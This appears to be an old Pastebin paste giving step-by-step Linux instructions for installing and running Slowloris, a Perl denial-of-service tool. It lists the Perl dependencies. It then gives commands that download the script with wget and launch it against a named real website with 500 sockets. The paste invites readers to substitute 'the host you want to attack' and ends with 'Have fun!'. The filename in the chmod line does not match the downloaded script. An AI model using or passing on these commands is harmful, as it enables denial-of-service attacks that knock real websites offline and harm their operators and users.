Advertisement
Guest User

Untitled

a guest
May 10th, 2011
2,817
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.93 KB | None | 0 0
  1. == How to install Slowloris on Linux ==
  2. Install perl from your packages, you should find it easily. Note that you need ithreads to be enabled (it should be enabled in most the distributions by default; on gentoo you should add the ithreads USE-flag before (re)installing perl).
  3. Then, you need IO/Socket/SSL, that you should find in your packages or searching on the web. In ubuntu, the package is libio-socket-ssl-perl; on gentoo, it's dev-perl/IO-Socket-SSL.
  4. Then, open a terminal/console and type (or copy-paste):
  5.  
  6. wget http://ha.ckers.org/slowloris/slowloris.pl
  7. chmod +x slowloris
  8. ./slowloris.pl -dns gerdab.ir -port 80 -timeout 2000 -num 500 -tcpto 5
  9.  
  10. You can replace gerbad.ir with the host you want to attack. You can also replace values for timeout and number of sockets (just by changing the last line), but these options should do it. If you want to run Slowloris again, once it has been installed, just run the last line.
  11. Have fun!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement